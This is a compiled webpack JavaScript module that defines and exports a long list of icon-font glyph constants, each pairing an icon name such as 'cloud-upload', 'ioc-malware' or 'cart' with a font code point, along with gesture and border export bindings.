/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_VICTORY", function() { return FINGERS_VICTORY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GESTURE_ZOOM", function() { return GESTURE_ZOOM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GESTURE_PINCH", function() { return GESTURE_PINCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_HORIZONTAL", function() { return FINGERS_SCROLL_HORIZONTAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_VERTICAL", function() { return FINGERS_SCROLL_VERTICAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_LEFT", function() { return FINGERS_SCROLL_LEFT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_RIGHT", function() { return FINGERS_SCROLL_RIGHT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "HAND2", function() { return HAND2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "POINTER_UP2", function() { return POINTER_UP2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "POINTER_RIGHT2", function() { return POINTER_RIGHT2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "POINTER_DOWN2", function() { return POINTER_DOWN2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "POINTER_LEFT2", function() { return POINTER_LEFT2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGER_TAP2", function() { return FINGER_TAP2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_TAP2", function() { return FINGERS_TAP2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "REMINDER2", function() { return REMINDER2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GESTURE_ZOOM2", function() { return GESTURE_ZOOM2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "GESTURE_PINCH2", function() { return GESTURE_PINCH2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_HORIZONTAL2", function() { return FINGERS_SCROLL_HORIZONTAL2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_VERTICAL2", function() { return FINGERS_SCROLL_VERTICAL2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_LEFT2", function() { return FINGERS_SCROLL_LEFT2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_RIGHT2", function() { return FINGERS_SCROLL_RIGHT2; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FINGERS_SCROLL_VERTICAL3", function() { return FINGERS_SCROLL_VERTICAL3; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_STYLE", function() { return BORDER_STYLE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_ALL", function() { return BORDER_ALL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_OUTER", function() { return BORDER_OUTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_INNER", function() { return BORDER_INNER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_TOP", function() { return BORDER_TOP; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_HORIZONTAL", function() { return BORDER_HORIZONTAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_BOTTOM", function() { return BORDER_BOTTOM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_LEFT", function() { return BORDER_LEFT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_VERTICAL", function() { return BORDER_VERTICAL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_RIGHT", function() { return BORDER_RIGHT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER_NONE", function() { return BORDER_NONE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ELLIPSIS", function() { return ELLIPSIS; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_2_0_types__ = __webpack_require__(97);

var SLACK = { name: 'slack', content: '\ea11' };
var GRAPH_ICON = { name: 'graph-icon', content: '\ea09' };
var CARD_FLIP = { name: 'card-flip', content: '\ea0a' };
var FULL_REPORT = { name: 'full-report', content: '\ea0b' };
var REPORTS_ICON = { name: 'reports-icon', content: '\ea0c' };
var DB = { name: 'DB', content: '\ea0d' };
var PHISHING = { name: 'phishing', content: '\e975' };
var WORKFLOWS = { name: 'workflows', content: '\ea02' };
var EXCLAMATION1 = { name: 'exclamation1', content: '\ea2f' };
var NAVBAR_TOUR = { name: 'navbar-tour', content: '\e9ee' };
var IOC_TAGS = { name: 'ioc-tags', content: '\e9ef' };
var NAVBAR_USER = { name: 'navbar-user', content: '\e9f0' };
var NAVBAR_CASES = { name: 'navbar-cases', content: '\e9f1' };
var IOC_REGISTRY_KEY = { name: 'ioc-registry-key', content: '\e9f2' };
var IOC_MALWARE = { name: 'ioc-malware', content: '\e9f3' };
var IOC_FILE = { name: 'ioc-file', content: '\e9f4' };
var IOC_IP = { name: 'ioc-ip', content: '\e9f5' };
var IOC_HASH = { name: 'ioc-hash', content: '\e9f6' };
var IOC_GLOBE = { name: 'ioc-globe', content: '\e9f7' };
var IOC_AT = { name: 'ioc-AT', content: '\e9fb' };
var NAVBAR_IOC = { name: 'navbar-IOC', content: '\e9fc' };
var NAVBAR_FUNNEL1 = { name: 'navbar-funnel1', content: '\e9ea' };
var EXCLAMATION = { name: 'exclamation', content: '\ea2e' };
var NAVBAR_MARKETPLACE = { name: 'navbar-marketplace', content: '\e9ec' };
var NAVBAR_NOTIFICATIONS = { name: 'navbar-notifications', content: '\e9ed' };
var HOME = { name: 'home', content: '\e600' };
var HOME2 = { name: 'home2', content: '\e601' };
var HOME3 = { name: 'home3', content: '\e602' };
var HOME4 = { name: 'home4', content: '\e603' };
var HOME5 = { name: 'home5', content: '\e604' };
var HOME6 = { name: 'home6', content: '\e605' };
var BATHTUB = { name: 'bathtub', content: '\e606' };
var TOOTHBRUSH = { name: 'toothbrush', content: '\e607' };
var BED = { name: 'bed', content: '\e608' };
var COUCH = { name: 'couch', content: '\e609' };
var CHAIR = { name: 'chair', content: '\e60a' };
var CITY = { name: 'city', content: '\e60b' };
var APARTMENT = { name: 'apartment', content: '\e60c' };
var PENCIL = { name: 'pencil', content: '\e60d' };
var PENCIL2 = { name: 'pencil2', content: '\e60e' };
var PEN = { name: 'pen', content: '\e60f' };
var PENCIL3 = { name: 'pencil3', content: '\e610' };
var ERASER = { name: 'eraser', content: '\e611' };
var PENCIL4 = { name: 'pencil4', content: '\e612' };
var PENCIL5 = { name: 'pencil5', content: '\e613' };
var FEATHER = { name: 'feather', content: '\e614' };
var FEATHER2 = { name: 'feather2', content: '\e615' };
var FEATHER3 = { name: 'feather3', content: '\e616' };
var PEN2 = { name: 'pen2', content: '\e617' };
var PEN_ADD = { name: 'pen-add', content: '\e618' };
var PEN_REMOVE = { name: 'pen-remove', content: '\e619' };
var VECTOR = { name: 'vector', content: '\e61a' };
var PEN3 = { name: 'pen3', content: '\e61b' };
var BLOG = { name: 'blog', content: '\e61c' };
var BRUSH = { name: 'brush', content: '\e61d' };
var BRUSH2 = { name: 'brush2', content: '\e61e' };
var SPRAY = { name: 'spray', content: '\e61f' };
var PAINT_ROLLER = { name: 'paint-roller', content: '\e620' };
var STAMP = { name: 'stamp', content: '\e621' };
var TAPE = { name: 'tape', content: '\e622' };
var DESK_TAPE = { name: 'desk-tape', content: '\e623' };
var TEXTURE = { name: 'texture', content: '\e624' };
var EYE_DROPPER = { name: 'eye-dropper', content: '\e625' };
var PALETTE = { name: 'palette', content: '\e626' };
var COLOR_SAMPLER = { name: 'color-sampler', content: '\e627' };
var BUCKET = { name: 'bucket', content: '\e628' };
var GRADIENT = { name: 'gradient', content: '\e629' };
var GRADIENT2 = { name: 'gradient2', content: '\e62a' };
var MAGIC_WAND = { name: 'magic-wand', content: '\e62b' };
var MAGNET = { name: 'magnet', content: '\e62c' };
var PENCIL_RULER = { name: 'pencil-ruler', content: '\e62d' };
var PENCIL_RULER2 = { name: 'pencil-ruler2', content: '\e62e' };
var COMPASS = { name: 'compass', content: '\e62f' };
var AIM = { name: 'aim', content: '\e630' };
var GUN = { name: 'gun', content: '\e631' };
var BOTTLE = { name: 'bottle', content: '\e632' };
var DROP = { name: 'drop', content: '\e633' };
var DROP_CROSSED = { name: 'drop-crossed', content: '\e634' };
var DROP2 = { name: 'drop2', content: '\e635' };
var SNOW = { name: 'snow', content: '\e636' };
var SNOW2 = { name: 'snow2', content: '\e637' };
var FIRE = { name: 'fire', content: '\e638' };
var LIGHTER = { name: 'lighter', content: '\e639' };
var KNIFE = { name: 'knife', content: '\e63a' };
var DAGGER = { name: 'dagger', content: '\e63b' };
var TISSUE = { name: 'tissue', content: '\e63c' };
var TOILET_PAPER = { name: 'toilet-paper', content: '\e63d' };
var POOP = { name: 'poop', content: '\e63e' };
var UMBRELLA = { name: 'umbrella', content: '\e63f' };
var UMBRELLA2 = { name: 'umbrella2', content: '\e640' };
var RAIN = { name: 'rain', content: '\e641' };
var TORNADO = { name: 'tornado', content: '\e642' };
var WIND = { name: 'wind', content: '\e643' };
var FAN = { name: 'fan', content: '\e644' };
var CONTRAST = { name: 'contrast', content: '\e645' };
var SUN_SMALL = { name: 'sun-small', content: '\e646' };
var SUN = { name: 'sun', content: '\e647' };
var SUN2 = { name: 'sun2', content: '\e648' };
var MOON = { name: 'moon', content: '\e649' };
var CLOUD = { name: 'cloud', content: '\e64a' };
var CLOUD_UPLOAD = { name: 'cloud-upload', content: '\e64b' };
var CLOUD_DOWNLOAD = { name: 'cloud-download', content: '\e64c' };
var CLOUD_RAIN = { name: 'cloud-rain', content: '\e64d' };
var CLOUD_HAILSTONES = { name: 'cloud-hailstones', content: '\e64e' };
var CLOUD_SNOW = { name: 'cloud-snow', content: '\e64f' };
var CLOUD_WINDY = { name: 'cloud-windy', content: '\e650' };
var SUN_WIND = { name: 'sun-wind', content: '\e651' };
var CLOUD_FOG = { name: 'cloud-fog', content: '\e652' };
var CLOUD_SUN = { name: 'cloud-sun', content: '\e653' };
var CLOUD_LIGHTNING = { name: 'cloud-lightning', content: '\e654' };
var CLOUD_SYNC = { name: 'cloud-sync', content: '\e655' };
var CLOUD_LOCK = { name: 'cloud-lock', content: '\e656' };
var CLOUD_GEAR = { name: 'cloud-gear', content: '\e657' };
var CLOUD_ALERT = { name: 'cloud-alert', content: '\e658' };
var CLOUD_CHECK = { name: 'cloud-check', content: '\e659' };
var CLOUD_CROSS = { name: 'cloud-cross', content: '\e65a' };
var CLOUD_CROSSED = { name: 'cloud-crossed', content: '\e65b' };
var CLOUD_DATABASE = { name: 'cloud-database', content: '\e65c' };
var DATABASE = { name: 'database', content: '\e65d' };
var DATABASE_ADD = { name: 'database-add', content: '\e65e' };
var DATABASE_REMOVE = { name: 'database-remove', content: '\e65f' };
var DATABASE_LOCK = { name: 'database-lock', content: '\e660' };
var DATABASE_REFRESH = { name: 'database-refresh', content: '\e661' };
var DATABASE_CHECK = { name: 'database-check', content: '\e662' };
var DATABASE_HISTORY = { name: 'database-history', content: '\e663' };
var DATABASE_UPLOAD = { name: 'database-upload', content: '\e664' };
var DATABASE_DOWNLOAD = { name: 'database-download', content: '\e665' };
var SERVER = { name: 'server', content: '\e666' };
var SHIELD1 = { name: 'shield1', content: '\e667' };
var SHIELD_CHECK = { name: 'shield-check', content: '\e668' };
var SHIELD_ALERT = { name: 'shield-alert', content: '\e669' };
var SHIELD_CROSS = { name: 'shield-cross', content: '\e66a' };
var LOCK = { name: 'lock', content: '\e66b' };
var ROTATION_LOCK = { name: 'rotation-lock', content: '\e66c' };
var UNLOCK = { name: 'unlock', content: '\e66d' };
var KEY = { name: 'key', content: '\e66e' };
var KEY_HOLE = { name: 'key-hole', content: '\e66f' };
var TOGGLE_OFF = { name: 'toggle-off', content: '\e670' };
var TOGGLE_ON = { name: 'toggle-on', content: '\e671' };
var COG = { name: 'cog', content: '\e672' };
var COG2 = { name: 'cog2', content: '\e673' };
var WRENCH = { name: 'wrench', content: '\e674' };
var SCREWDRIVER = { name: 'screwdriver', content: '\e675' };
var HAMMER_WRENCH = { name: 'hammer-wrench', content: '\e676' };
var HAMMER = { name: 'hammer', content: '\e677' };
var SAW = { name: 'saw', content: '\e678' };
var AXE = { name: 'axe', content: '\e679' };
var AXE2 = { name: 'axe2', content: '\e67a' };
var SHOVEL = { name: 'shovel', content: '\e67b' };
var PICKAXE = { name: 'pickaxe', content: '\e67c' };
var FACTORY = { name: 'factory', content: '\e67d' };
var FACTORY2 = { name: 'factory2', content: '\e67e' };
var RECYCLE = { name: 'recycle', content: '\e67f' };
var TRASH = { name: 'trash', content: '\e680' };
var TRASH2 = { name: 'trash2', content: '\e681' };
var TRASH3 = { name: 'trash3', content: '\e682' };
var BROOM = { name: 'broom', content: '\e683' };
var GAME = { name: 'game', content: '\e684' };
var GAMEPAD = { name: 'gamepad', content: '\e685' };
var JOYSTICK = { name: 'joystick', content: '\e686' };
var DICE = { name: 'dice', content: '\e687' };
var SPADES = { name: 'spades', content: '\e688' };
var DIAMONDS = { name: 'diamonds', content: '\e689' };
var CLUBS = { name: 'clubs', content: '\e68a' };
var HEARTS = { name: 'hearts', content: '\e68b' };
var HEART = { name: 'heart', content: '\e68c' };
var STAR = { name: 'star', content: '\e68d' };
var STAR_HALF = { name: 'star-half', content: '\e68e' };
var STAR_EMPTY = { name: 'star-empty', content: '\e68f' };
var FLAG = { name: 'flag', content: '\e690' };
var FLAG2 = { name: 'flag2', content: '\e691' };
var FLAG3 = { name: 'flag3', content: '\e692' };
var MAILBOX_FULL = { name: 'mailbox-full', content: '\e693' };
var MAILBOX_EMPTY = { name: 'mailbox-empty', content: '\e694' };
var AT_SIGN = { name: 'at-sign', content: '\e695' };
var ENVELOPE = { name: 'envelope', content: '\e696' };
var ENVELOPE_OPEN = { name: 'envelope-open', content: '\e697' };
var PAPERCLIP = { name: 'paperclip', content: '\e698' };
var PAPER_PLANE = { name: 'paper-plane', content: '\e699' };
var REPLY = { name: 'reply', content: '\e69a' };
var REPLY_ALL = { name: 'reply-all', content: '\e69b' };
var INBOX = { name: 'inbox', content: '\e69c' };
var INBOX2 = { name: 'inbox2', content: '\e69d' };
var OUTBOX = { name: 'outbox', content: '\e69e' };
var BOX = { name: 'box', content: '\e69f' };
var ARCHIVE = { name: 'archive', content: '\e6a0' };
var ARCHIVE2 = { name: 'archive2', content: '\e6a1' };
var DRAWERS = { name: 'drawers', content: '\e6a2' };
var DRAWERS2 = { name: 'drawers2', content: '\e6a3' };
var DRAWERS3 = { name: 'drawers3', content: '\e6a4' };
var EYE = { name: 'eye', content: '\e6a5' };
var EYE_CROSSED = { name: 'eye-crossed', content: '\e6a6' };
var EYE_PLUS = { name: 'eye-plus', content: '\e6a7' };
var EYE_MINUS = { name: 'eye-minus', content: '\e6a8' };
var BINOCULARS = { name: 'binoculars', content: '\e6a9' };
var BINOCULARS2 = { name: 'binoculars2', content: '\e6aa' };
var HDD = { name: 'hdd', content: '\e6ab' };
var HDD_DOWN = { name: 'hdd-down', content: '\e6ac' };
var HDD_UP = { name: 'hdd-up', content: '\e6ad' };
var FLOPPY_DISK = { name: 'floppy-disk', content: '\e6ae' };
var DISC = { name: 'disc', content: '\e6af' };
var TAPE2 = { name: 'tape2', content: '\e6b0' };
var PRINTER = { name: 'printer', content: '\e6b1' };
var SHREDDER = { name: 'shredder', content: '\e6b2' };
var FILE_EMPTY = { name: 'file-empty', content: '\e6b3' };
var FILE_ADD = { name: 'file-add', content: '\e6b4' };
var FILE_CHECK = { name: 'file-check', content: '\e6b5' };
var FILE_LOCK = { name: 'file-lock', content: '\e6b6' };
var FILES = { name: 'files', content: '\e6b7' };
var COPY = { name: 'copy', content: '\e6b8' };
var COMPARE = { name: 'compare', content: '\e6b9' };
var FOLDER = { name: 'folder', content: '\e6ba' };
var FOLDER_SEARCH = { name: 'folder-search', content: '\e6bb' };
var FOLDER_PLUS = { name: 'folder-plus', content: '\e6bc' };
var FOLDER_MINUS = { name: 'folder-minus', content: '\e6bd' };
var FOLDER_DOWNLOAD = { name: 'folder-download', content: '\e6be' };
var FOLDER_UPLOAD = { name: 'folder-upload', content: '\e6bf' };
var FOLDER_STAR = { name: 'folder-star', content: '\e6c0' };
var FOLDER_HEART = { name: 'folder-heart', content: '\e6c1' };
var FOLDER_USER = { name: 'folder-user', content: '\e6c2' };
var FOLDER_SHARED = { name: 'folder-shared', content: '\e6c3' };
var FOLDER_MUSIC = { name: 'folder-music', content: '\e6c4' };
var FOLDER_PICTURE = { name: 'folder-picture', content: '\e6c5' };
var FOLDER_FILM = { name: 'folder-film', content: '\e6c6' };
var SCISSORS = { name: 'scissors', content: '\e6c7' };
var PASTE = { name: 'paste', content: '\e6c8' };
var CLIPBOARD_EMPTY = { name: 'clipboard-empty', content: '\e6c9' };
var CLIPBOARD_PENCIL = { name: 'clipboard-pencil', content: '\e6ca' };
var CLIPBOARD_TEXT = { name: 'clipboard-text', content: '\e6cb' };
var CLIPBOARD_CHECK = { name: 'clipboard-check', content: '\e6cc' };
var CLIPBOARD_DOWN = { name: 'clipboard-down', content: '\e6cd' };
var CLIPBOARD_LEFT = { name: 'clipboard-left', content: '\e6ce' };
var CLIPBOARD_ALERT = { name: 'clipboard-alert', content: '\e6cf' };
var CLIPBOARD_USER = { name: 'clipboard-user', content: '\e6d0' };
var REGISTER = { name: 'register', content: '\e6d1' };
var ENTER = { name: 'enter', content: '\e6d2' };
var EXIT = { name: 'exit', content: '\e6d3' };
var PAPERS = { name: 'papers', content: '\e6d4' };
var NEWS = { name: 'news', content: '\e6d5' };
var READING = { name: 'reading', content: '\e6d6' };
var TYPEWRITER = { name: 'typewriter', content: '\e6d7' };
var DOCUMENT = { name: 'document', content: '\e6d8' };
var DOCUMENT2 = { name: 'document2', content: '\e6d9' };
var GRADUATION_HAT = { name: 'graduation-hat', content: '\e6da' };
var LICENSE = { name: 'license', content: '\e6db' };
var LICENSE2 = { name: 'license2', content: '\e6dc' };
var MEDAL_EMPTY = { name: 'medal-empty', content: '\e6dd' };
var MEDAL_FIRST = { name: 'medal-first', content: '\e6de' };
var MEDAL_SECOND = { name: 'medal-second', content: '\e6df' };
var MEDAL_THIRD = { name: 'medal-third', content: '\e6e0' };
var PODIUM = { name: 'podium', content: '\e6e1' };
var TROPHY = { name: 'trophy', content: '\e6e2' };
var TROPHY2 = { name: 'trophy2', content: '\e6e3' };
var MUSIC_NOTE = { name: 'music-note', content: '\e6e4' };
var MUSIC_NOTE2 = { name: 'music-note2', content: '\e6e5' };
var MUSIC_NOTE3 = { name: 'music-note3', content: '\e6e6' };
var PLAYLIST = { name: 'playlist', content: '\e6e7' };
var PLAYLIST_ADD = { name: 'playlist-add', content: '\e6e8' };
var GUITAR = { name: 'guitar', content: '\e6e9' };
var TRUMPET = { name: 'trumpet', content: '\e6ea' };
var ALBUM = { name: 'album', content: '\e6eb' };
var SHUFFLE = { name: 'shuffle', content: '\e6ec' };
var REPEAT_ONE = { name: 'repeat-one', content: '\e6ed' };
var REPEAT = { name: 'repeat', content: '\e6ee' };
var HEADPHONES = { name: 'headphones', content: '\e6ef' };
var HEADSET = { name: 'headset', content: '\e6f0' };
var LOUDSPEAKER = { name: 'loudspeaker', content: '\e6f1' };
var EQUALIZER = { name: 'equalizer', content: '\e6f2' };
var THEATER = { name: 'theater', content: '\e6f3' };
var X_3D_GLASSES = { name: '3d-glasses', content: '\e6f4' };
var TICKET = { name: 'ticket', content: '\e6f5' };
var PRESENTATION = { name: 'presentation', content: '\e6f6' };
var PLAY = { name: 'play', content: '\e6f7' };
var FILM_PLAY = { name: 'film-play', content: '\e6f8' };
var CLAPBOARD_PLAY = { name: 'clapboard-play', content: '\e6f9' };
var MEDIA = { name: 'media', content: '\e6fa' };
var FILM = { name: 'film', content: '\e6fb' };
var FILM2 = { name: 'film2', content: '\e6fc' };
var SURVEILLANCE = { name: 'surveillance', content: '\e6fd' };
var SURVEILLANCE2 = { name: 'surveillance2', content: '\e6fe' };
var CAMERA = { name: 'camera', content: '\e6ff' };
var CAMERA_CROSSED = { name: 'camera-crossed', content: '\e700' };
var CAMERA_PLAY = { name: 'camera-play', content: '\e701' };
var TIME_LAPSE = { name: 'time-lapse', content: '\e702' };
var RECORD = { name: 'record', content: '\e703' };
var CAMERA2 = { name: 'camera2', content: '\e704' };
var CAMERA_FLIP = { name: 'camera-flip', content: '\e705' };
var PANORAMA = { name: 'panorama', content: '\e706' };
var TIME_LAPSE2 = { name: 'time-lapse2', content: '\e707' };
var SHUTTER = { name: 'shutter', content: '\e708' };
var SHUTTER2 = { name: 'shutter2', content: '\e709' };
var FACE_DETECTION = { name: 'face-detection', content: '\e70a' };
var FLARE = { name: 'flare', content: '\e70b' };
var CONVEX = { name: 'convex', content: '\e70c' };
var CONCAVE = { name: 'concave', content: '\e70d' };
var PICTURE = { name: 'picture', content: '\e70e' };
var PICTURE2 = { name: 'picture2', content: '\e70f' };
var PICTURE3 = { name: 'picture3', content: '\e710' };
var PICTURES = { name: 'pictures', content: '\e711' };
var BOOK = { name: 'book', content: '\e712' };
var AUDIO_BOOK = { name: 'audio-book', content: '\e713' };
var BOOK2 = { name: 'book2', content: '\e714' };
var BOOKMARK = { name: 'bookmark', content: '\e715' };
var BOOKMARK2 = { name: 'bookmark2', content: '\e716' };
var LABEL = { name: 'label', content: '\e717' };
var LIBRARY = { name: 'library', content: '\e718' };
var LIBRARY2 = { name: 'library2', content: '\e719' };
var CONTACTS = { name: 'contacts', content: '\e71a' };
var PROFILE = { name: 'profile', content: '\e71b' };
var PORTRAIT = { name: 'portrait', content: '\e71c' };
var PORTRAIT2 = { name: 'portrait2', content: '\e71d' };
var USER1 = { name: 'user1', content: '\e71e' };
var USER_PLUS = { name: 'user-plus', content: '\e71f' };
var USER_MINUS = { name: 'user-minus', content: '\e720' };
var USER_LOCK = { name: 'user-lock', content: '\e721' };
var USERS = { name: 'users', content: '\e722' };
var USERS2 = { name: 'users2', content: '\e723' };
var USERS_PLUS = { name: 'users-plus', content: '\e724' };
var USERS_MINUS = { name: 'users-minus', content: '\e725' };
var GROUP_WORK = { name: 'group-work', content: '\e726' };
var WOMAN = { name: 'woman', content: '\e727' };
var MAN = { name: 'man', content: '\e728' };
var BABY = { name: 'baby', content: '\e729' };
var BABY2 = { name: 'baby2', content: '\e72a' };
var BABY3 = { name: 'baby3', content: '\e72b' };
var BABY_BOTTLE = { name: 'baby-bottle', content: '\e72c' };
var WALK = { name: 'walk', content: '\e72d' };
var HAND_WAVING = { name: 'hand-waving', content: '\e72e' };
var JUMP = { name: 'jump', content: '\e72f' };
var RUN = { name: 'run', content: '\e730' };
var WOMAN2 = { name: 'woman2', content: '\e731' };
var MAN2 = { name: 'man2', content: '\e732' };
var MAN_WOMAN = { name: 'man-woman', content: '\e733' };
var HEIGHT = { name: 'height', content: '\e734' };
var WEIGHT = { name: 'weight', content: '\e735' };
var SCALE = { name: 'scale', content: '\e736' };
var BUTTON = { name: 'button', content: '\e737' };
var BOW_TIE = { name: 'bow-tie', content: '\e738' };
var TIE = { name: 'tie', content: '\e739' };
var SOCKS = { name: 'socks', content: '\e73a' };
var SHOE = { name: 'shoe', content: '\e73b' };
var SHOES = { name: 'shoes', content: '\e73c' };
var HAT = { name: 'hat', content: '\e73d' };
var PANTS = { name: 'pants', content: '\e73e' };
var SHORTS = { name: 'shorts', content: '\e73f' };
var FLIP_FLOPS = { name: 'flip-flops', content: '\e740' };
var SHIRT = { name: 'shirt', content: '\e741' };
var HANGER = { name: 'hanger', content: '\e742' };
var LAUNDRY = { name: 'laundry', content: '\e743' };
var STORE = { name: 'store', content: '\e744' };
var HAIRCUT = { name: 'haircut', content: '\e745' };
var STORE_24 = { name: 'store-24', content: '\e746' };
var BARCODE = { name: 'barcode', content: '\e747' };
var BARCODE2 = { name: 'barcode2', content: '\e748' };
var BARCODE3 = { name: 'barcode3', content: '\e749' };
var CASHIER = { name: 'cashier', content: '\e74a' };
var BAG = { name: 'bag', content: '\e74b' };
var BAG2 = { name: 'bag2', content: '\e74c' };
var CART = { name: 'cart', content: '\e74d' };
var CART_EMPTY = { name: 'cart-empty', content: '\e74e' };
var CART_FULL = { name: 'cart-full', content: '\e74f' };
var CART_PLUS = { name: 'cart-plus', content: '\e750' };
var CART_PLUS2 = { name: 'cart-plus2', content: '\e751' };
var CART_ADD = { name: 'cart-add', content: '\e752' };
var CART_REMOVE = { name: 'cart-remove', content: '\e753' };
var CART_EXCHANGE = { name: 'cart-exchange', content: '\e754' };
var TAG = { name: 'tag', content: '\e755' };
var TAGS1 = { name: 'tags1', content: '\e756' };
var RECEIPT = { name: 'receipt', content: '\e757' };
var WALLET = { name: 'wallet', content: '\e758' };
var CREDIT_CARD = { name: 'credit-card', content: '\e759' };
var CASH_DOLLAR = { name: 'cash-dollar', content: '\e75a' };
var CASH_EURO = { name: 'cash-euro', content: '\e75b' };
var CASH_POUND = { name: 'cash-pound', content: '\e75c' };
var CASH_YEN = { name: 'cash-yen', content: '\e75d' };
var BAG_DOLLAR = { name: 'bag-dollar', content: '\e75e' };
var BAG_EURO = { name: 'bag-euro', content: '\e75f' };
var BAG_POUND = { name: 'bag-pound', content: '\e760' };
var BAG_YEN = { name: 'bag-yen', content: '\e761' };
var COIN_DOLLAR = { name: 'coin-dollar', content: '\e762' };
var COIN_EURO = { name: 'coin-euro', content: '\e763' };
var COIN_POUND = { name: 'coin-pound', content: '\e764' };
var COIN_YEN = { name: 'coin-yen', content: '\e765' };
var CALCULATOR = { name: 'calculator', content: '\e766' };
var CALCULATOR2 = { name: 'calculator2', content: '\e767' };
var ABACUS = { name: 'abacus', content: '\e768' };
var VAULT = { name: 'vault', content: '\e769' };
var TELEPHONE = { name: 'telephone', content: '\e76a' };
var PHONE_LOCK = { name: 'phone-lock', content: '\e76b' };
var PHONE_WAVE = { name: 'phone-wave', content: '\e76c' };
var PHONE_PAUSE = { name: 'phone-pause', content: '\e76d' };
var PHONE_OUTGOING = { name: 'phone-outgoing', content: '\e76e' };
var PHONE_INCOMING = { name: 'phone-incoming', content: '\e76f' };
var PHONE_IN_OUT = { name: 'phone-in-out', content: '\e770' };
var PHONE_ERROR = { name: 'phone-error', content: '\e771' };
var PHONE_SIP = { name: 'phone-sip', content: '\e772' };
var PHONE_PLUS = { name: 'phone-plus', content: '\e773' };
var PHONE_MINUS = { name: 'phone-minus', content: '\e774' };
var VOICEMAIL = { name: 'voicemail', content: '\e775' };
var DIAL = { name: 'dial', content: '\e776' };
var TELEPHONE2 = { name: 'telephone2', content: '\e777' };
var PUSHPIN = { name: 'pushpin', content: '\e778' };
var PUSHPIN2 = { name: 'pushpin2', content: '\e779' };
var MAP_MARKER = { name: 'map-marker', content: '\e77a' };
var MAP_MARKER_USER = { name: 'map-marker-user', content: '\e77b' };
var MAP_MARKER_DOWN = { name: 'map-marker-down', content: '\e77c' };
var MAP_MARKER_CHECK = { name: 'map-marker-check', content: '\e77d' };
var MAP_MARKER_CROSSED = { name: 'map-marker-crossed', content: '\e77e' };
var RADAR = { name: 'radar', content: '\e77f' };
var COMPASS2 = { name: 'compass2', content: '\e780' };
var MAP = { name: 'map', content: '\e781' };
var MAP2 = { name: 'map2', content: '\e782' };
var LOCATION = { name: 'location', content: '\e783' };
var ROAD_SIGN = { name: 'road-sign', content: '\e784' };
var CALENDAR_EMPTY = { name: 'calendar-empty', content: '\e785' };
var CALENDAR_CHECK = { name: 'calendar-check', content: '\e786' };
var CALENDAR_CROSS = { name: 'calendar-cross', content: '\e787' };
var CALENDAR_31 = { name: 'calendar-31', content: '\e788' };
var CALENDAR_FULL = { name: 'calendar-full', content: '\e789' };
var CALENDAR_INSERT = { name: 'calendar-insert', content: '\e78a' };
var CALENDAR_TEXT = { name: 'calendar-text', content: '\e78b' };
var CALENDAR_USER = { name: 'calendar-user', content: '\e78c' };
var MOUSE = { name: 'mouse', content: '\e78d' };
var MOUSE_LEFT = { name: 'mouse-left', content: '\e78e' };
var MOUSE_RIGHT = { name: 'mouse-right', content: '\e78f' };
var MOUSE_BOTH = { name: 'mouse-both', content: '\e790' };
var KEYBOARD = { name: 'keyboard', content: '\e791' };
var KEYBOARD_UP = { name: 'keyboard-up', content: '\e792' };
var KEYBOARD_DOWN = { name: 'keyboard-down', content: '\e793' };
var DELETE = { name: 'delete', content: '\e794' };
var SPELL_CHECK = { name: 'spell-check', content: '\e795' };
var ESCAPE = { name: 'escape', content: '\e796' };
var ENTER2 = { name: 'enter2', content: '\e797' };
var SCREEN = { name: 'screen', content: '\e798' };
var ASPECT_RATIO = { name: 'aspect-ratio', content: '\e799' };
var SIGNAL = { name: 'signal', content: '\e79a' };
var SIGNAL_LOCK = { name: 'signal-lock', content: '\e79b' };
var SIGNAL_80 = { name: 'signal-80', content: '\e79c' };
var SIGNAL_60 = { name: 'signal-60', content: '\e79d' };
var SIGNAL_40 = { name: 'signal-40', content: '\e79e' };
var SIGNAL_20 = { name: 'signal-20', content: '\e79f' };
var SIGNAL_0 = { name: 'signal-0', content: '\e7a0' };
var SIGNAL_BLOCKED = { name: 'signal-blocked', content: '\e7a1' };
var SIM = { name: 'sim', content: '\e7a2' };
